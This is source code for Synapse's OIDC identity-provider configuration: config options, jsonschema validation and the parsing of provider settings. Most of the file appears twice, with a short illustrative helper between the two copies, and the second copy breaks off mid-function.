The module that JinjaOidcMappingProvider is in was renamed, we want to # transparently handle both the same. LEGACY_USER_MAPPING_PROVIDER = "synapse.handlers.oidc_handler.JinjaOidcMappingProvider" class OIDCConfig(Config): section = "oidc" def read_config(self, config, **kwargs) -> None: self.oidc_providers = tuple(_parse_oidc_provider_configs(config)) if not self.oidc_providers: return try: check_requirements("oidc") except DependencyException as e: raise ConfigError( e.message # noqa: B306, DependencyException.message is a property ) from e # check we don't have any duplicate idp_ids now. (The SSO handler will also # check for duplicates when the REST listeners get registered, but that happens # after synapse has forked so doesn't give nice errors.) c = Counter([i.idp_id for i in self.oidc_providers]) for idp_id, count in c.items(): if count > 1: raise ConfigError( "Multiple OIDC providers have the idp_id %r." % idp_id ) public_baseurl = self.root.server.public_baseurl self.oidc_callback_url = public_baseurl + "_synapse/client/oidc/callback" @property def oidc_enabled(self) -> bool: # OIDC is enabled if we have a provider return bool(self.oidc_providers) def generate_config_section(self, config_dir_path, server_name, **kwargs) -> str: return """\ # List of OpenID Connect (OIDC) / OAuth 2.0 identity providers, for registration # and login. # # Options for each entry include: # # idp_id: a unique identifier for this identity provider. Used internally # by Synapse; should be a single word such as 'github'. # # Note that, if this is changed, users authenticating via that provider # will no longer be recognised as the same user! # # (Use "oidc" here if you are migrating from an old "oidc_config" # configuration.) # # idp_name: A user-facing name for this identity provider, which is used to # offer the user a choice of login mechanisms. # # idp_icon: An optional icon for this identity provider, which is presented # by clients and Synapse's own IdP picker page. If given, must be an # MXC URI of the format mxc://<server-name>/<media-id>. (An easy way to # obtain such an MXC URI is to upload an image to an (unencrypted) room # and then copy the "url" from the source of the event.) 
# # idp_brand: An optional brand for this identity provider, allowing clients # to style the login flow according to the identity provider in question. # See the spec for possible options here. # # discover: set to 'false' to disable the use of the OIDC discovery mechanism # to discover endpoints. Defaults to true. # # issuer: Required. The OIDC issuer. Used to validate tokens and (if discovery # is enabled) to discover the provider's endpoints. # # client_id: Required. oauth2 client id to use. # # client_secret: oauth2 client secret to use. May be omitted if # client_secret_jwt_key is given, or if client_auth_method is 'none'. # # client_secret_jwt_key: Alternative to client_secret: details of a key used # to create a JSON Web Token to be used as an OAuth2 client secret. If # given, must be a dictionary with the following properties: # # key: a pem-encoded signing key. Must be a suitable key for the # algorithm specified. Required unless 'key_file' is given. # # key_file: the path to file containing a pem-encoded signing key file. # Required unless 'key' is given. # # jwt_header: a dictionary giving properties to include in the JWT # header. Must include the key 'alg', giving the algorithm used to # sign the JWT, such as "ES256", using the JWA identifiers in # RFC7518. # # jwt_payload: an optional dictionary giving properties to include in # the JWT payload. Normally this should include an 'iss' key. # # client_auth_method: auth method to use when exchanging the token. Valid # values are 'client_secret_basic' (default), 'client_secret_post' and # 'none'. # # scopes: list of scopes to request. This should normally include the "openid" # scope. Defaults to ["openid"]. # # authorization_endpoint: the oauth2 authorization endpoint. Required if # provider discovery is disabled. # # token_endpoint: the oauth2 token endpoint. Required if provider discovery is # disabled. # # userinfo_endpoint: the OIDC userinfo endpoint. Required if discovery is # disabled and the 'openid' scope is not requested. # # jwks_uri: URI where to fetch the JWKS. Required if discovery is disabled and # the 'openid' scope is used. # # skip_verification: set to 'true' to skip metadata verification. Use this if # you are connecting to a provider that is not OpenID Connect compliant. # Defaults to false. Avoid this in production. # # user_profile_method: Whether to fetch the user profile from the userinfo # endpoint. Valid values are: 'auto' or 'userinfo_endpoint'. # # Defaults to 'auto', which fetches the userinfo endpoint if 'openid' is # included in 'scopes'. Set to 'userinfo_endpoint' to always fetch the # userinfo endpoint. # # allow_existing_users: set to 'true' to allow a user logging in via OIDC to # match a pre-existing account instead of failing. This could be used if # switching from password logins to OIDC. Defaults to false. # # user_mapping_provider: Configuration for how attributes returned from a OIDC # provider are mapped onto a matrix user. This setting has the following # sub-properties: # # module: The class name of a custom mapping module. Default is # {mapping_provider!r}. # See https://matrix-org.github.io/synapse/latest/sso_mapping_providers.html#openid-mapping-providers # for information on implementing a custom mapping provider. # # config: Configuration for the mapping provider module. This section will # be passed as a Python dictionary to the user mapping provider # module's `parse_config` method. 
# # For the default provider, the following settings are available: # # subject_claim: name of the claim containing a unique identifier # for the user. Defaults to 'sub', which OpenID Connect # compliant providers should provide. # # localpart_template: Jinja2 template for the localpart of the MXID. # If this is not set, the user will be prompted to choose their # own username (see 'sso_auth_account_details.html' in the 'sso' # section of this file). # # display_name_template: Jinja2 template for the display name to set # on first login. If unset, no displayname will be set. # # email_template: Jinja2 template for the email address of the user. # If unset, no email address will be added to the account. # # extra_attributes: a map of Jinja2 templates for extra attributes # to send back to the client during login. # Note that these are non-standard and clients will ignore them # without modifications. # # When rendering, the Jinja2 templates are given a 'user' variable, # which is set to the claims returned by the UserInfo Endpoint and/or # in the ID Token. # # It is possible to configure Synapse to only allow logins if certain attributes # match particular values in the OIDC userinfo. The requirements can be listed under # `attribute_requirements` as shown below. All of the listed attributes must # match for the login to be permitted. Additional attributes can be added to # userinfo by expanding the `scopes` section of the OIDC config to retrieve # additional information from the OIDC provider. # # If the OIDC claim is a list, then the attribute must match any value in the list. # Otherwise, it must exactly match the value of the claim. Using the example # below, the `family_name` claim MUST be "Stephensson", but the `groups` # claim MUST contain "admin". # # attribute_requirements: # - attribute: family_name # value: "Stephensson" # - attribute: groups # value: "admin" # # See https://matrix-org.github.io/synapse/latest/openid.html # for information on how to configure these options. # # For backwards compatibility, it is also possible to configure a single OIDC # provider via an 'oidc_config' setting. This is now deprecated and admins are # advised to migrate to the 'oidc_providers' format. (When doing that migration, # use 'oidc' for the idp_id to ensure that existing users continue to be # recognised.) 
# oidc_providers: # Generic example # #- idp_id: my_idp # idp_name: "My OpenID provider" # idp_icon: "mxc://example.com/mediaid" # discover: false # issuer: "https://accounts.example.com/" # client_id: "provided-by-your-issuer" # client_secret: "provided-by-your-issuer" # client_auth_method: client_secret_post # scopes: ["openid", "profile"] # authorization_endpoint: "https://accounts.example.com/oauth2/auth" # token_endpoint: "https://accounts.example.com/oauth2/token" # userinfo_endpoint: "https://accounts.example.com/userinfo" # jwks_uri: "https://accounts.example.com/.well-known/jwks.json" # skip_verification: true # user_mapping_provider: # config: # subject_claim: "id" # localpart_template: "{{{{ user.login }}}}" # display_name_template: "{{{{ user.name }}}}" # email_template: "{{{{ user.email }}}}" # attribute_requirements: # - attribute: userGroup # value: "synapseUsers" """.format( mapping_provider=DEFAULT_USER_MAPPING_PROVIDER ) # jsonschema definition of the configuration settings for an oidc identity provider OIDC_PROVIDER_CONFIG_SCHEMA = { "type": "object", "required": ["issuer", "client_id"], "properties": { "idp_id": { "type": "string", "minLength": 1, # MSC2858 allows a maxlen of 255, but we prefix with "oidc-" "maxLength": 250, "pattern": "^[A-Za-z0-9._~-]+$", }, "idp_name": {"type": "string"}, "idp_icon": {"type": "string"}, "idp_brand": { "type": "string", "minLength": 1, "maxLength": 255, "pattern": "^[a-z][a-z0-9_.-]*$", }, "discover": {"type": "boolean"}, "issuer": {"type": "string"}, "client_id": {"type": "string"}, "client_secret": {"type": "string"}, "client_secret_jwt_key": { "type": "object", "required": ["jwt_header"], "oneOf": [ {"required": ["key"]}, {"required": ["key_file"]}, ], "properties": { "key": {"type": "string"}, "key_file": {"type": "string"}, "jwt_header": { "type": "object", "required": ["alg"], "properties": { "alg": {"type": "string"}, }, "additionalProperties": {"type": "string"}, }, "jwt_payload": { "type": "object", "additionalProperties": {"type": "string"}, }, }, }, "client_auth_method": { "type": "string", # the following list is the same as the keys of # authlib.oauth2.auth.ClientAuth.DEFAULT_AUTH_METHODS. We inline it # to avoid importing authlib here. "enum": ["client_secret_basic", "client_secret_post", "none"], }, "scopes": {"type": "array", "items": {"type": "string"}}, "authorization_endpoint": {"type": "string"}, "token_endpoint": {"type": "string"}, "userinfo_endpoint": {"type": "string"}, "jwks_uri": {"type": "string"}, "skip_verification": {"type": "boolean"}, "user_profile_method": { "type": "string", "enum": ["auto", "userinfo_endpoint"], }, "allow_existing_users": {"type": "boolean"}, "user_mapping_provider": {"type": ["object", "null"]}, "attribute_requirements": { "type": "array", "items": SsoAttributeRequirement.JSON_SCHEMA, }, }, } # the same as OIDC_PROVIDER_CONFIG_SCHEMA, but with compulsory idp_id and idp_name OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA = { "allOf": [OIDC_PROVIDER_CONFIG_SCHEMA, {"required": ["idp_id", "idp_name"]}] } # the `oidc_providers` list can either be None (as it is in the default config), or # a list of provider configs, each of which requires an explicit ID and name. OIDC_PROVIDER_LIST_SCHEMA = { "oneOf": [ {"type": "null"}, {"type": "array", "items": OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA}, ] } # the `oidc_config` setting can either be None (which it used to be in the default # config), or an object. If an object, it is ignored unless it has an "enabled: True" # property. 
# # It's *possible* to represent this with jsonschema, but the resultant errors aren't # particularly clear, so we just check for either an object or a null here, and do # additional checks in the code. OIDC_CONFIG_SCHEMA = {"oneOf": [{"type": "null"}, {"type": "object"}]} # the top-level schema can contain an "oidc_config" and/or an "oidc_providers". MAIN_CONFIG_SCHEMA = { "type": "object", "properties": { "oidc_config": OIDC_CONFIG_SCHEMA, "oidc_providers": OIDC_PROVIDER_LIST_SCHEMA, }, } def _parse_oidc_provider_configs(config: JsonDict) -> Iterable["OidcProviderConfig"]: """extract and parse the OIDC provider configs from the config dict The configuration may contain either a single `oidc_config` object with an `enabled: True` property, or a list of provider configurations under `oidc_providers`, *or both*. Returns a generator which yields the OidcProviderConfig objects """ validate_config(MAIN_CONFIG_SCHEMA, config, ()) for i, p in enumerate(config.get("oidc_providers") or []): yield _parse_oidc_config_dict(p, ("oidc_providers", "<item %i>" % (i,))) # for backwards-compatibility, it is also possible to provide a single "oidc_config" # object with an "enabled: True" property. oidc_config = config.get("oidc_config") if oidc_config and oidc_config.get("enabled", False): # MAIN_CONFIG_SCHEMA checks that `oidc_config` is an object, but not that # it matches OIDC_PROVIDER_CONFIG_SCHEMA (see the comments on OIDC_CONFIG_SCHEMA # above), so now we need to validate it. validate_config(OIDC_PROVIDER_CONFIG_SCHEMA, oidc_config, ("oidc_config",)) yield _parse_oidc_config_dict(oidc_config, ("oidc_config",)) def _parse_oidc_config_dict( oidc_config: JsonDict, config_path: Tuple[str, ...] ) -> "OidcProviderConfig": """Take the configuration dict and parse it into an OidcProviderConfig Raises: ConfigError if the configuration is malformed. """ ump_config = oidc_config.get("user_mapping_provider", {}) ump_config.setdefault("module", DEFAULT_USER_MAPPING_PROVIDER) if ump_config.get("module") == LEGACY_USER_MAPPING_PROVIDER: ump_config["module"] = DEFAULT_USER_MAPPING_PROVIDER ump_config.setdefault("config", {}) ( user_mapping_provider_class, user_mapping_provider_config, ) = load_module(ump_config, config_path + ("user_mapping_provider",)) # Ensure loaded user mapping module has defined all necessary methods required_methods = [ "get_remote_user_id", "map_user_attributes", ] missing_methods = [ method for method in required_methods if not hasattr(user_mapping_provider_class, method) ] if missing_methods: raise ConfigError( "Class %s is missing required " "methods: %s" % ( user_mapping_provider_class, ", ".join(missing_methods), ), config_path + ("user_mapping_provider", "module"), ) idp_id = oidc_config.get("idp_id", "oidc") # prefix the given IDP with a prefix specific to the SSO mechanism, to avoid # clashes with other mechs (such as SAML, CAS). # # We allow "oidc" as an exception so that people migrating from old-style # "oidc_config" format (which has long used "oidc" as its idp_id) can migrate to # a new-style "oidc_providers" entry without changing the idp_id for their provider # (and thereby invalidating their user_external_ids data). 
if idp_id != "oidc": idp_id = "oidc-" + idp_id # MSC2858 also specifies that the idp_icon must be a valid MXC uri idp_icon = oidc_config.get("idp_icon") if idp_icon is not None: try: parse_and_validate_mxc_uri(idp_icon) except ValueError as e: raise ConfigError( "idp_icon must be a valid MXC URI", config_path + ("idp_icon",) ) from e client_secret_jwt_key_config = oidc_config.get("client_secret_jwt_key") client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey] = None if client_secret_jwt_key_config is not None: keyfile = client_secret_jwt_key_config.get("key_file") if keyfile: key = read_file(keyfile, config_path + ("client_secret_jwt_key",)) else: key = client_secret_jwt_key_config["key"] client_secret_jwt_key = OidcProviderClientSecretJwtKey( key=key, jwt_header=client_secret_jwt_key_config["jwt_header"], jwt_payload=client_secret_jwt_key_config.get("jwt_payload", {}), ) # parse attribute_requirements from config (list of dicts) into a list of SsoAttributeRequirement attribute_requirements = [ SsoAttributeRequirement(**x) for x in oidc_config.get("attribute_requirements", []) ] return OidcProviderConfig( idp_id=idp_id, idp_name=oidc_config.get("idp_name", "OIDC"), idp_icon=idp_icon, idp_brand=oidc_config.get("idp_brand"), discover=oidc_config.get("discover", True), issuer=oidc_config["issuer"], client_id=oidc_config["client_id"], client_secret=oidc_config.get("client_secret"), client_secret_jwt_key=client_secret_jwt_key, client_auth_method=oidc_config.get("client_auth_method", "client_secret_basic"), scopes=oidc_config.get("scopes", ["openid"]), authorization_endpoint=oidc_config.get("authorization_endpoint"), token_endpoint=oidc_config.get("token_endpoint"), userinfo_endpoint=oidc_config.get("userinfo_endpoint"), jwks_uri=oidc_config.get("jwks_uri"), skip_verification=oidc_config.get("skip_verification", False), user_profile_method=oidc_config.get("user_profile_method", "auto"), allow_existing_users=oidc_config.get("allow_existing_users", False), user_mapping_provider_class=user_mapping_provider_class, user_mapping_provider_config=user_mapping_provider_config, attribute_requirements=attribute_requirements, ) @attr.s(slots=True, frozen=True, auto_attribs=True) class OidcProviderClientSecretJwtKey: # a pem-encoded signing key key: str # properties to include in the JWT header jwt_header: Mapping[str, str] # properties to include in the JWT payload. jwt_payload: Mapping[str, str] @attr.s(slots=True, frozen=True, auto_attribs=True) class OidcProviderConfig: # a unique identifier for this identity provider. Used in the 'user_external_ids' # table, as well as the query/path parameter used in the login protocol. idp_id: str # user-facing name for this identity provider. idp_name: str # Optional MXC URI for icon for this IdP. idp_icon: Optional[str] # Optional brand identifier for this IdP. idp_brand: Optional[str] # whether the OIDC discovery mechanism is used to discover endpoints discover: bool # the OIDC issuer. Used to validate tokens and (if discovery is enabled) to # discover the provider's endpoints. issuer: str # oauth2 client id to use client_id: str # oauth2 client secret to use. if `None`, use client_secret_jwt_key to generate # a secret. client_secret: Optional[str] # key to use to construct a JWT to use as a client secret. May be `None` if # `client_secret` is set. client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey] # auth method to use when exchanging the token. # Valid values are 'client_secret_basic', 'client_secret_post' and # 'none'. 
client_auth_method: str # list of scopes to request scopes: Collection[str] # the oauth2 authorization endpoint. Required if discovery is disabled. authorization_endpoint: Optional[str] # the oauth2 token endpoint. Required if discovery is disabled. token_endpoint: Optional[str] # the OIDC userinfo endpoint. Required if discovery is disabled and the # "openid" scope is not requested. userinfo_endpoint: Optional[str] # URI where to fetch the JWKS. Required if discovery is disabled and the # "openid" scope is used. jwks_uri: Optional[str] # Whether to skip metadata verification skip_verification: bool # Whether to fetch the user profile from the userinfo endpoint. Valid # values are: "auto" or "userinfo_endpoint". user_profile_method: str # whether to allow a user logging in via OIDC to match a pre-existing account # instead of failing allow_existing_users: bool # the class of the user mapping provider user_mapping_provider_class: Type # the config of the user mapping provider user_mapping_provider_config: Any # required attributes to require in userinfo to allow login/registration attribute_requirements: List[SsoAttributeRequirement]
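# A short, standalone illustration of the idp_id prefixing rule implemented by
# _parse_oidc_config_dict() above: every provider id except the legacy "oidc"
# id is prefixed with "oidc-" so it cannot clash with other SSO mechanisms
# (SAML, CAS). The provider dict below is a made-up minimal example shaped
# like OIDC_PROVIDER_CONFIG_SCHEMA; it is not validated against synapse here.
def effective_idp_id(oidc_config: dict) -> str:
    idp_id = oidc_config.get("idp_id", "oidc")
    return idp_id if idp_id == "oidc" else "oidc-" + idp_id


if __name__ == "__main__":
    provider = {
        "idp_id": "my_idp",
        "idp_name": "My OpenID provider",
        "issuer": "https://accounts.example.com/",
        "client_id": "provided-by-your-issuer",
    }
    print(effective_idp_id(provider))  # -> oidc-my_idp
    print(effective_idp_id({"issuer": "https://example.org/", "client_id": "x"}))  # -> oidc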
# Copyright 2020 Quentin Gliech # Copyright 2020-2021 The Matrix.org Foundation C.I.C. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from collections import Counter from typing import Any, Collection, Iterable, List, Mapping, Optional, Tuple, Type import attr from synapse.config._util import validate_config from synapse.config.sso import SsoAttributeRequirement from synapse.python_dependencies import DependencyException, check_requirements from synapse.types import JsonDict from synapse.util.module_loader import load_module from synapse.util.stringutils import parse_and_validate_mxc_uri from ._base import Config, ConfigError, read_file DEFAULT_USER_MAPPING_PROVIDER = "synapse.handlers.oidc.JinjaOidcMappingProvider" # The module that JinjaOidcMappingProvider is in was renamed, we want to # transparently handle both the same. LEGACY_USER_MAPPING_PROVIDER = "synapse.handlers.oidc_handler.JinjaOidcMappingProvider" class OIDCConfig(Config): section = "oidc" def read_config(self, config, **kwargs) -> None: self.oidc_providers = tuple(_parse_oidc_provider_configs(config)) if not self.oidc_providers: return try: check_requirements("oidc") except DependencyException as e: raise ConfigError( e.message # noqa: B306, DependencyException.message is a property ) from e # check we don't have any duplicate idp_ids now. (The SSO handler will also # check for duplicates when the REST listeners get registered, but that happens # after synapse has forked so doesn't give nice errors.) c = Counter([i.idp_id for i in self.oidc_providers]) for idp_id, count in c.items(): if count > 1: raise ConfigError( "Multiple OIDC providers have the idp_id %r." % idp_id ) public_baseurl = self.root.server.public_baseurl self.oidc_callback_url = public_baseurl + "_synapse/client/oidc/callback" @property def oidc_enabled(self) -> bool: # OIDC is enabled if we have a provider return bool(self.oidc_providers) def generate_config_section(self, config_dir_path, server_name, **kwargs) -> str: return """\ # List of OpenID Connect (OIDC) / OAuth 2.0 identity providers, for registration # and login. # # Options for each entry include: # # idp_id: a unique identifier for this identity provider. Used internally # by Synapse; should be a single word such as 'github'. # # Note that, if this is changed, users authenticating via that provider # will no longer be recognised as the same user! # # (Use "oidc" here if you are migrating from an old "oidc_config" # configuration.) # # idp_name: A user-facing name for this identity provider, which is used to # offer the user a choice of login mechanisms. # # idp_icon: An optional icon for this identity provider, which is presented # by clients and Synapse's own IdP picker page. If given, must be an # MXC URI of the format mxc://<server-name>/<media-id>. (An easy way to # obtain such an MXC URI is to upload an image to an (unencrypted) room # and then copy the "url" from the source of the event.) 
# # idp_brand: An optional brand for this identity provider, allowing clients # to style the login flow according to the identity provider in question. # See the spec for possible options here. # # discover: set to 'false' to disable the use of the OIDC discovery mechanism # to discover endpoints. Defaults to true. # # issuer: Required. The OIDC issuer. Used to validate tokens and (if discovery # is enabled) to discover the provider's endpoints. # # client_id: Required. oauth2 client id to use. # # client_secret: oauth2 client secret to use. May be omitted if # client_secret_jwt_key is given, or if client_auth_method is 'none'. # # client_secret_jwt_key: Alternative to client_secret: details of a key used # to create a JSON Web Token to be used as an OAuth2 client secret. If # given, must be a dictionary with the following properties: # # key: a pem-encoded signing key. Must be a suitable key for the # algorithm specified. Required unless 'key_file' is given. # # key_file: the path to file containing a pem-encoded signing key file. # Required unless 'key' is given. # # jwt_header: a dictionary giving properties to include in the JWT # header. Must include the key 'alg', giving the algorithm used to # sign the JWT, such as "ES256", using the JWA identifiers in # RFC7518. # # jwt_payload: an optional dictionary giving properties to include in # the JWT payload. Normally this should include an 'iss' key. # # client_auth_method: auth method to use when exchanging the token. Valid # values are 'client_secret_basic' (default), 'client_secret_post' and # 'none'. # # scopes: list of scopes to request. This should normally include the "openid" # scope. Defaults to ["openid"]. # # authorization_endpoint: the oauth2 authorization endpoint. Required if # provider discovery is disabled. # # token_endpoint: the oauth2 token endpoint. Required if provider discovery is # disabled. # # userinfo_endpoint: the OIDC userinfo endpoint. Required if discovery is # disabled and the 'openid' scope is not requested. # # jwks_uri: URI where to fetch the JWKS. Required if discovery is disabled and # the 'openid' scope is used. # # skip_verification: set to 'true' to skip metadata verification. Use this if # you are connecting to a provider that is not OpenID Connect compliant. # Defaults to false. Avoid this in production. # # user_profile_method: Whether to fetch the user profile from the userinfo # endpoint. Valid values are: 'auto' or 'userinfo_endpoint'. # # Defaults to 'auto', which fetches the userinfo endpoint if 'openid' is # included in 'scopes'. Set to 'userinfo_endpoint' to always fetch the # userinfo endpoint. # # allow_existing_users: set to 'true' to allow a user logging in via OIDC to # match a pre-existing account instead of failing. This could be used if # switching from password logins to OIDC. Defaults to false. # # user_mapping_provider: Configuration for how attributes returned from a OIDC # provider are mapped onto a matrix user. This setting has the following # sub-properties: # # module: The class name of a custom mapping module. Default is # {mapping_provider!r}. # See https://matrix-org.github.io/synapse/latest/sso_mapping_providers.html#openid-mapping-providers # for information on implementing a custom mapping provider. # # config: Configuration for the mapping provider module. This section will # be passed as a Python dictionary to the user mapping provider # module's `parse_config` method. 
# # For the default provider, the following settings are available: # # subject_claim: name of the claim containing a unique identifier # for the user. Defaults to 'sub', which OpenID Connect # compliant providers should provide. # # localpart_template: Jinja2 template for the localpart of the MXID. # If this is not set, the user will be prompted to choose their # own username (see 'sso_auth_account_details.html' in the 'sso' # section of this file). # # display_name_template: Jinja2 template for the display name to set # on first login. If unset, no displayname will be set. # # email_template: Jinja2 template for the email address of the user. # If unset, no email address will be added to the account. # # extra_attributes: a map of Jinja2 templates for extra attributes # to send back to the client during login. # Note that these are non-standard and clients will ignore them # without modifications. # # When rendering, the Jinja2 templates are given a 'user' variable, # which is set to the claims returned by the UserInfo Endpoint and/or # in the ID Token. # # It is possible to configure Synapse to only allow logins if certain attributes # match particular values in the OIDC userinfo. The requirements can be listed under # `attribute_requirements` as shown below. All of the listed attributes must # match for the login to be permitted. Additional attributes can be added to # userinfo by expanding the `scopes` section of the OIDC config to retrieve # additional information from the OIDC provider. # # If the OIDC claim is a list, then the attribute must match any value in the list. # Otherwise, it must exactly match the value of the claim. Using the example # below, the `family_name` claim MUST be "Stephensson", but the `groups` # claim MUST contain "admin". # # attribute_requirements: # - attribute: family_name # value: "Stephensson" # - attribute: groups # value: "admin" # # See https://matrix-org.github.io/synapse/latest/openid.html # for information on how to configure these options. # # For backwards compatibility, it is also possible to configure a single OIDC # provider via an 'oidc_config' setting. This is now deprecated and admins are # advised to migrate to the 'oidc_providers' format. (When doing that migration, # use 'oidc' for the idp_id to ensure that existing users continue to be # recognised.) 
# oidc_providers: # Generic example # #- idp_id: my_idp # idp_name: "My OpenID provider" # idp_icon: "mxc://example.com/mediaid" # discover: false # issuer: "https://accounts.example.com/" # client_id: "provided-by-your-issuer" # client_secret: "provided-by-your-issuer" # client_auth_method: client_secret_post # scopes: ["openid", "profile"] # authorization_endpoint: "https://accounts.example.com/oauth2/auth" # token_endpoint: "https://accounts.example.com/oauth2/token" # userinfo_endpoint: "https://accounts.example.com/userinfo" # jwks_uri: "https://accounts.example.com/.well-known/jwks.json" # skip_verification: true # user_mapping_provider: # config: # subject_claim: "id" # localpart_template: "{{{{ user.login }}}}" # display_name_template: "{{{{ user.name }}}}" # email_template: "{{{{ user.email }}}}" # attribute_requirements: # - attribute: userGroup # value: "synapseUsers" """.format( mapping_provider=DEFAULT_USER_MAPPING_PROVIDER ) # jsonschema definition of the configuration settings for an oidc identity provider OIDC_PROVIDER_CONFIG_SCHEMA = { "type": "object", "required": ["issuer", "client_id"], "properties": { "idp_id": { "type": "string", "minLength": 1, # MSC2858 allows a maxlen of 255, but we prefix with "oidc-" "maxLength": 250, "pattern": "^[A-Za-z0-9._~-]+$", }, "idp_name": {"type": "string"}, "idp_icon": {"type": "string"}, "idp_brand": { "type": "string", "minLength": 1, "maxLength": 255, "pattern": "^[a-z][a-z0-9_.-]*$", }, "discover": {"type": "boolean"}, "issuer": {"type": "string"}, "client_id": {"type": "string"}, "client_secret": {"type": "string"}, "client_secret_jwt_key": { "type": "object", "required": ["jwt_header"], "oneOf": [ {"required": ["key"]}, {"required": ["key_file"]}, ], "properties": { "key": {"type": "string"}, "key_file": {"type": "string"}, "jwt_header": { "type": "object", "required": ["alg"], "properties": { "alg": {"type": "string"}, }, "additionalProperties": {"type": "string"}, }, "jwt_payload": { "type": "object", "additionalProperties": {"type": "string"}, }, }, }, "client_auth_method": { "type": "string", # the following list is the same as the keys of # authlib.oauth2.auth.ClientAuth.DEFAULT_AUTH_METHODS. We inline it # to avoid importing authlib here. "enum": ["client_secret_basic", "client_secret_post", "none"], }, "scopes": {"type": "array", "items": {"type": "string"}}, "authorization_endpoint": {"type": "string"}, "token_endpoint": {"type": "string"}, "userinfo_endpoint": {"type": "string"}, "jwks_uri": {"type": "string"}, "skip_verification": {"type": "boolean"}, "user_profile_method": { "type": "string", "enum": ["auto", "userinfo_endpoint"], }, "allow_existing_users": {"type": "boolean"}, "user_mapping_provider": {"type": ["object", "null"]}, "attribute_requirements": { "type": "array", "items": SsoAttributeRequirement.JSON_SCHEMA, }, }, } # the same as OIDC_PROVIDER_CONFIG_SCHEMA, but with compulsory idp_id and idp_name OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA = { "allOf": [OIDC_PROVIDER_CONFIG_SCHEMA, {"required": ["idp_id", "idp_name"]}] } # the `oidc_providers` list can either be None (as it is in the default config), or # a list of provider configs, each of which requires an explicit ID and name. OIDC_PROVIDER_LIST_SCHEMA = { "oneOf": [ {"type": "null"}, {"type": "array", "items": OIDC_PROVIDER_CONFIG_WITH_ID_SCHEMA}, ] } # the `oidc_config` setting can either be None (which it used to be in the default # config), or an object. If an object, it is ignored unless it has an "enabled: True" # property. 
# # It's *possible* to represent this with jsonschema, but the resultant errors aren't # particularly clear, so we just check for either an object or a null here, and do # additional checks in the code. OIDC_CONFIG_SCHEMA = {"oneOf": [{"type": "null"}, {"type": "object"}]} # the top-level schema can contain an "oidc_config" and/or an "oidc_providers". MAIN_CONFIG_SCHEMA = { "type": "object", "properties": { "oidc_config": OIDC_CONFIG_SCHEMA, "oidc_providers": OIDC_PROVIDER_LIST_SCHEMA, }, } def _parse_oidc_provider_configs(config: JsonDict) -> Iterable["OidcProviderConfig"]: """extract and parse the OIDC provider configs from the config dict The configuration may contain either a single `oidc_config` object with an `enabled: True` property, or a list of provider configurations under `oidc_providers`, *or both*. Returns a generator which yields the OidcProviderConfig objects """ validate_config(MAIN_CONFIG_SCHEMA, config, ()) for i, p in enumerate(config.get("oidc_providers") or []): yield _parse_oidc_config_dict(p, ("oidc_providers", "<item %i>" % (i,))) # for backwards-compatibility, it is also possible to provide a single "oidc_config" # object with an "enabled: True" property. oidc_config = config.get("oidc_config") if oidc_config and oidc_config.get("enabled", False): # MAIN_CONFIG_SCHEMA checks that `oidc_config` is an object, but not that # it matches OIDC_PROVIDER_CONFIG_SCHEMA (see the comments on OIDC_CONFIG_SCHEMA # above), so now we need to validate it. validate_config(OIDC_PROVIDER_CONFIG_SCHEMA, oidc_config, ("oidc_config",)) yield _parse_oidc_config_dict(oidc_config, ("oidc_config",)) def _parse_oidc_config_dict( oidc_config: JsonDict, config_path: Tuple[str, ...] ) -> "OidcProviderConfig": """Take the configuration dict and parse it into an OidcProviderConfig Raises: ConfigError if the configuration is malformed. """ ump_config = oidc_config.get("user_mapping_provider", {}) ump_config.setdefault("module", DEFAULT_USER_MAPPING_PROVIDER) if ump_config.get("module") == LEGACY_USER_MAPPING_PROVIDER: ump_config["module"] = DEFAULT_USER_MAPPING_PROVIDER ump_config.setdefault("config", {}) ( user_mapping_provider_class, user_mapping_provider_config, ) = load_module(ump_config, config_path + ("user_mapping_provider",)) # Ensure loaded user mapping module has defined all necessary methods required_methods = [ "get_remote_user_id", "map_user_attributes", ] missing_methods = [ method for method in required_methods if not hasattr(user_mapping_provider_class, method) ] if missing_methods: raise ConfigError( "Class %s is missing required " "methods: %s" % ( user_mapping_provider_class, ", ".join(missing_methods), ), config_path + ("user_mapping_provider", "module"), ) idp_id = oidc_config.get("idp_id", "oidc") # prefix the given IDP with a prefix specific to the SSO mechanism, to avoid # clashes with other mechs (such as SAML, CAS). # # We allow "oidc" as an exception so that people migrating from old-style # "oidc_config" format (which has long used "oidc" as its idp_id) can migrate to # a new-style "oidc_providers" entry without changing the idp_id for their provider # (and thereby invalidating their user_external_ids data). 
if idp_id != "oidc": idp_id = "oidc-" + idp_id # MSC2858 also specifies that the idp_icon must be a valid MXC uri idp_icon = oidc_config.get("idp_icon") if idp_icon is not None: try: parse_and_validate_mxc_uri(idp_icon) except ValueError as e: raise ConfigError( "idp_icon must be a valid MXC URI", config_path + ("idp_icon",) ) from e client_secret_jwt_key_config = oidc_config.get("client_secret_jwt_key") client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey] = None if client_secret_jwt_key_config is not None: keyfile = client_secret_jwt_key_config.get("key_file") if keyfile: key = read_file(keyfile, config_path + ("client_secret_jwt_key",)) else: key = client_secret_jwt_key_config["key"] client_secret_jwt_key = OidcProviderClientSecretJwtKey( key=key, jwt_header=client_secret_jwt_key_config["jwt_header"], jwt_payload=client_secret_jwt_key_config.get("jwt_payload", {}), ) # parse attribute_requirements from config (list of dicts) into a list of SsoAttributeRequirement attribute_requirements = [ SsoAttributeRequirement(**x) for x in oidc_config.get("attribute_requirements", []) ] return OidcProviderConfig( idp_id=idp_id, idp_name=oidc_config.get("idp_name", "OIDC"), idp_icon=idp_icon, idp_brand=oidc_config.get("idp_brand"), discover=oidc_config.get("discover", True), issuer=oidc_config["issuer"], client_id=oidc_config["client_id"], client_secret=oidc_config.get("client_secret"), client_secret_jwt_key=client_secret_jwt_key, client_auth_method=oidc_config.get("client_auth_method", "client_secret_basic"), scopes=oidc_config.get("scopes", ["openid"]), authorization_endpoint=oidc_config.get("authorization_endpoint"), 